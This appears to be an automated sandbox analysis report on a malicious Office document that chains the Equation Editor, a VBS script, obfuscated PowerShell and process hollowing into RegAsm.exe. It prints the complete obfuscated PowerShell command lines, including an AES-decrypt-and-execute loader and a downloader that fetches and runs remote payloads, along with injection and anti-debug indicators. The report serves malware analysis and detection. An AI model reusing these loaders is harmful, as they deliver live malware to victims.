Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856	Thread sleep count: 1458 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856	Thread sleep time: -4374000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3844	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3852	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3852	Thread sleep time: -89000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3932	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856	Thread sleep count: 8047 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856	Thread sleep time: -24141000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3992	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3992	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2040	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3264	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3264	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648	Thread sleep count: 3248 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648	Thread sleep count: 6713 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2364	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	16_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	16_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	16_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	16_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044E879 FindFirstFileExA,	16_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	16_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040783C FindFirstFileW,FindNextFileW,	16_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	16_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	16_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	16_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	16_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10006580 FindFirstFileExA,	16_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,	18_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

16_2_00407C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 18_2_00418981 memset,GetSystemInfo,

18_2_00418981

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_004349F9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

18_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

16_2_0041CB50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004432B5 mov eax, dword ptr fs:[00000030h]		16_2_004432B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10004AB4 mov eax, dword ptr fs:[00000030h]		16_2_10004AB4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

16_2_00411CFE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00434B47 SetUnhandledExceptionFilter,	16_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00434FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 680, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

16_2_004180EF

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

16_2_004120F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00419627 mouse_event,

16_2_00419627

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nazcoqq"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b 